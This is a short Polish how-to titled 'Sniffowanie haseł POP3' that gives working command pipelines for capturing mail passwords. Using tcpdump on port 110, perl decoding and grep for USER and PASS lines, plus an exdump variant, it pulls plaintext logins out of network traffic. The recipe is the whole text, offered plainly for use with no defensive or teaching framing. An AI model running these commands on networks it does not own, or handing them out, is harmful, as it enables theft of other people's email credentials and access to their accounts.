Sniffowanie haseł POP3

Wysniffować pasełka do POP-a da się odpalając tcpdump i pompując output przez grepa:

tcpdump -n -X -s 1514 tcp port 110 and dst host my.ad.dr.es |

perl -p -e 's/^.*\t(.*)\n/$1/; s/^(\d\d:)/\n$1/' |

grep -B 1 -E 'USER|PASS'

A dla starszej wersji tcpdumpa, bez opcji "-X":

tcpdump -n -s 1514 tcp port 110 and dst host my.ad.dr.es |

perl -p -e 's/^.*\t(.*)\n/$1/ && s/\s+//g &&

s/([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg &&

s/([\000-\011\013-\037])/./g;

s/^(\d\d:)/\n$1/' |

grep -B 1 -E 'USER|PASS'

Inny pomysł to pobranie narzędzia exdump ze strony oficjalnej albo z mojego archiwum.

A kompilacji wydać komendę:

exdump -ctu -p 110 -v | grep -E 'USER|PASS'

I czekać cierpliwie.